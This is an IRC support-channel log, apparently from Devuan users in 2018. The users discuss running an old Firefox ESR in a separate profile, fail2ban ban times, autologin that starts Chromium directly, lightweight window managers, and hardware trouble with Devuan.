nemo | jordila: http://ftp.mozilla.org/pub/firefox/releases/52.9.0esr/ | 16:52 |
jordila | nemo, i was reading on https://mozilla.debian.net/ that ... | 16:52 |
nemo | er | 16:52 |
nemo | https://ftp.mozilla.org/pub/firefox/releases/52.9.0esr/ | 16:52 |
jordila | could it be that i'm able to add repo's for v52 à la 'Debian Mozilla' team... or may have i dreamed it ? | 16:53 |
nemo | jordila: 52 is unsupported simple as that. I don't think it's a good idea to have it outside your user folder at all | 16:54 |
nemo | jordila: ideally keep it in a separate account | 16:54 |
nemo | in maybe a jail | 16:54 |
jordila | ah | 16:54 |
nemo | while there's certainly good reasons to have it, it's not really safe to use | 16:55 |
nemo | jordila: definitely use noscript and turn off plugins when browsing web | 16:55 |
nemo | jordila: just use the mozilla zip in a user home | 16:56 |
nemo | maybe clone one of your firefox profiles | 16:56 |
nemo | jordila: do you know about -no-remote and -P ? | 16:56 |
jordila | no to yet, nemo. | 16:57 |
system16 | im in the fail2ban conf file right now | 16:57 |
jordila | (typo : not yet, nemo ) | 16:58 |
system16 | should i enable ssh_ddos ? | 16:58 |
system16 | its False | 16:58 |
system16 | also the fail2ban is working. i managed to get my phone banned for 10 min | 16:58 |
system16 | i want to change bantime to 2hrs | 16:59 |
jordila | nemo , what is -no-remote and -P ? | 16:59 |
nemo | jordila: -P is for launching alternate profiles -no-remote ensures if you have firefox already running the new one doesn't try to use it instead | 17:10 |
nemo | jordila: so... firefox -no-remote -P unsafeLegacyProfile | 17:11 |
system16 | nemo | 17:11 |
nemo | make a shortcut like that | 17:11 |
system16 | my phone is banned for 20000 | 17:11 |
system16 | seconds | 17:11 |
system16 | 2000* | 17:11 |
nemo | system16: ssh ddos? can't hurt. | 17:12 |
jordila | nemo , i think i might go in other direction ... instead of downgrading, i would rather upgrade to the very last (Nightly) Firefox version ? | 17:13 |
nemo | jordila: I did that myself, just to get more usable addons... and 'cause I was already using nightly anyway | 17:13 |
nemo | jordila: I'd still suggest backing up profile | 17:13 |
jordila | nice to know , nemo | 17:14 |
nemo | jordila: cp -r your existing firefox profile to a new name and use the profile manager to add it | 17:14 |
system16 | nemo since i didnt know what it exactly does, i didnt touch it | 17:14 |
nemo | that way if nightly or the addons you installed in nightly eff something up, nbd | 17:14 |
nemo | jordila: https://support.mozilla.org/en-US/kb/profile-manager-create-and-remove-firefox-profiles | 17:15 |
nemo | jordila: it's funny how few people know of this feature that firefox has had for like... since forever. since it was the Mozilla web browser | 17:15 |
nemo | chrome finally adds profiles, people get super excited. firefox adds the container thing "oh, you mean like chrome profiles?" NO | 17:16 |
nemo | jordila: firefox -no-remote -P to launch the profile manager to set all this up | 17:16 |
system16 | yelp | 17:17 |
system16 | 2018-11-23 16:20:35,100 fail2ban.actions[2641]: INFO Set banTime = 600 | 17:17 |
nemo | (their walkthrough says "close all firefox" meh, whatever -no-remote is more convenient) | 17:17 |
system16 | it didnt do shit | 17:17 |
system16 | i added bantime = 2000 to every section | 17:17 |
system16 | there was no bantime in that conf file. i was told to manually add it | 17:18 |
premoboss | hi dudes. i am using lightdm and LXDE with automatic login. the pc is dedicated only to web surfing. i will like to avoid lxde and run as soon as the PC start a web navigator (ie. chromium). there is a way to do that? | 17:32 |
jonadab | premoboss: Most obvious way is to create a custom session type. | 17:33 |
jonadab | There should be how-to documents online for how to create a custom X11 session, I think. | 17:34 |
premoboss | jonadab, i dont know how to do. can you point me out that howto if you know where it is? i tried to search but probably i used the wrong keywords in google because i dont find good infos. | 17:35 |
jonadab | I don't happen to know off the top of my head. I've done it before, but it's been a while. | 17:35 |
jonadab | Try the phrase "custom X11 session", or something like that. | 17:35 |
premoboss | thanks. | 17:36 |
jonadab | Or maybe man 5 xsession | 17:37 |
jonadab | As best I can remember, you create two things: The session itself is an executable file (usually a simple shell script) that starts the things you want. If you're starting multiple things, all but the last one should be started in the background with &. You typically put this file in /usr/local/bin | 17:41 |
jonadab | And the other thing is a description file that the display manager (or startx or whatever) can read in order to know that this type of session is available. This is a text file in a specific config-like format that specifies things like what the session is called in the list of possible session types, what program to run for it, and a couple of other things. | 17:42 |
jonadab | This has to go in a particular directory, and that location is the main part that I don't remember off the top of my head. | 17:42 |
jonadab | You can copy one of the existing ones and edit it, that's what I did. | 17:42 |
jonadab | Ah, /usr/share/xsessions is the magic location, I think. | 17:44 |
jonadab | HTH.HAND. | 17:44 |
premoboss | nice to know, thanks jonadab. i go to try | 17:55 |
errandir1 | why run lightdm in the first place if you want to autologin? After auto login just do startx to start the WM | 17:57 |
premoboss | errandir1, because i am going to modify an existing distro, i mean not building from scratch. | 17:58 |
errandir1 | sure, but you can disable any service you don't need in any distro | 18:00 |
premoboss | errandir1, my need is: start a graphical application (firefox or chromium) as soon as the PC start. the need is to do autologon in the pc and to minimize the start up time from "turn on pc" to "usable firefox" | 18:01 |
jonadab | errandir1: lightdm is one way to _do_ autologin, I think. | 18:02 |
iovec | agetty can do autologin, don't need a DM for that | 18:03 |
errandir1 | to me it's just too heavy a hammer, and premoboss wants to minimize the startup time. To minimize that start by not running anything you don't need | 18:04 |
jonadab | All true, as far as it goes. | 18:04 |
jonadab | But sometimes people design things based on what they already know how to do. | 18:05 |
jonadab | But yes, console autologin + startx in the login script would be more efficient, technically. | 18:05 |
premoboss | errandir1, i already disabled daemons, recompiled kernel to reduce his size and his time to load. now i must work on GUI. if you know better way to follow, please tell me. i can remove lightdm and lxde, the important thing is login and to run automatically chromium at login. | 18:06 |
premoboss | at login = at start of the pc. | 18:06 |
errandir1 | you'll need lxde to show chromium | 18:07 |
errandir1 | start like iovec says, get agetty to do the autologin | 18:07 |
errandir1 | lxde will read the .Xclients file when it starts, so start chromium from there. | 18:08 |
premoboss | errandir1, is it not possible to start chromium on X server without to have lxde between X and chromium? | 18:08 |
errandir1 | maybe, I've never tried that myself. All the other stuff I have done | 18:09 |
iovec | premoboss: possible, just execute into chromium in your xinitrc script | 18:22 |
premoboss | gonna try, thanks. | 18:22 |
iovec | keep in mind you would have no window management available, and no auxiliary daemons for session management, so either use a DE/WM, or for them in the background before executing into it. | 18:22 |
iovec | fork* | 18:23 |
jonadab | premoboss: There has to _be_ a window manager. LXDE isn't the only option, there may be something lighter weight, but there has to be one. | 18:31 |
jonadab | Dunno if twm is still actively maintained. fvwm probably. Not sure how these compare to lxde. | 18:31 |
jonadab | Oh, actually, look at tiling window managers though. | 18:31 |
jonadab | There are several of those, they tend to be pretty lightweight. | 18:31 |
jonadab | ratpoison was the first, I think, but it may not be current now. | 18:32 |
telst4r | dwm. | 18:32 |
premoboss | i used twm in past, i will give a look even if it was very "primitive" but also very light | 18:32 |
telst4r | or something that sucks less. | 18:32 |
jonadab | If you can get chromium to only ever use one window ever, no dialog boxes or anything, then the window manager could potentially be _extremely_ lightweight. | 18:33 |
jonadab | But I don't know if chromium can be quite that window-sparse. Most applications cannot. | 18:34 |
koollman | there doesn't have to be one, but it's very, very limited without one :) | 18:35 |
forester | Hi. Have a Devuan 2 live CD a modemmanager? | 19:35 |
forester | to use usb modem for internet access | 19:36 |
filipdevuan_ | so funny https://systemd-free.artixlinux.org/img/systemd-devours-all.gif | 20:33 |
furrywolf | lol | 20:36 |
newsanchor | Devuan sucks. It destroyed my computer. Any thoughts? | 20:36 |
iovec | i sympathize with you | 20:37 |
filipdevuan_ | how did devuan destroy your computer?? | 20:39 |
newsanchor | it freezes if it has to perform more than 3 tasks. And I know it is unpopular to say but it worked with windows | 20:41 |
newsanchor | does anyone have a solution for Linux ASUS T100A compatibility? | 20:42 |
filipdevuan_ | what tasks are these any tasks?? or any specific software?? :D | 20:42 |
newsanchor | receiving e-mail in thunderbird and browsing at the same time is too much for HIM now...:( | 20:45 |
newsanchor | So, downloading data... | 20:46 |
Anselmo | is this unique to devuan or is it just a linux thing, | 20:46 |
filipdevuan_ | thats really weird and i dont know why maybe u should use different email client for example claws mail | 20:47 |
newsanchor | I tried. Because I really wanted linux to work, but it didn't help | 20:48 |
Anselmo | the issue is, lack of memory ? | 20:49 |
Anselmo | are you just, running out of memory and swapping ? | 20:50 |
newsanchor | Devuan also didn't work on HP EliteBook 2760p/162A. But the HP works with Ubuntu. Do not know why... | 20:51 |
newsanchor | I don't think that I lack on memory | 20:52 |
newsanchor | And the HP didn't even want to start. Maybe I am just Devuan unlucky | 20:52 |
Anselmo | hrm | 20:53 |
filipdevuan_ | so i believe its not devuan that sucks but your laptop | 22:04 |
filipdevuan_ | hey if synaptic package manager has outdated version of some app how can i download the newer one using terminal?? | 23:51 |